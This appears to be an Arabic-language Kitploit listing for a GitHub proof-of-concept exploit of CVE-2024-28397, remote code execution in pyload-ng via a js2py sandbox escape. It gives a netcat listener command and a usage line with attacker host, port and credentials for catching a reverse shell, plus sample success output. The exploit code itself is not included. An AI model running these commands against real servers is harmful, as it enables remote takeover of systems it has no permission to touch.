Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويب
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

استغلال PoC للثغرة CVE-2024-28397 – تنفيذ تعليمات برمجية عن بُعد في pyload-ng عبر هروب من بيئة js2py المعزولة (sandbox escape)

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
منذ شهر واحدلم تتم المراجعة بعد

استغلال تنفيذ التعليمات البرمجية عن بُعد – CVE-2024-28397 (pyload-ng / js2py)

يحتوي هذا المستودع على استغلال إثبات المفهوم (PoC) لثغرة CVE-2024-28397، وهي ثغرة تنفيذ تعليمات برمجية عن بُعد تؤثر على pyload-ng بسبب الاستخدام غير الآمن لمكتبة js2py.

إخلاء مسؤولية:
هذا الاستغلال لأغراض تعليمية وبحثية فقط.
لا تستخدمه على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.
المؤلف غير مسؤول عن أي إساءة استخدام لهذا الكود.


تفاصيل الثغرة

  • معرّف CVE: CVE-2024-28397
  • المكوّن: js2py في pyload-ng
  • الأثر: تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • ناقل الهجوم: حمولة JavaScript خبيثة تهرب من بيئة العزل (sandbox) في js2py وتنفّذ أوامر تعسفية على النظام.

المتطلبات والإعداد

ستحتاج إلى Python 3.x ومكتبة requests وnetcat لالتقاط الصدفة العكسية.

  • الهدف ← مثيل pyload-ng ثغري مع إمكانية الوصول إلى نقطة النهاية /run_code

المستمع ← ابدأ قبل تشغيل الاستغلال:

nc -lvnp 4444

الاستخدام:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

مثال على المخرجات:

  • [+] التسجيل ناجح!
  • [+] تسجيل الدخول ناجح
  • [+] الاستغلال نجح
تنزيل الأداة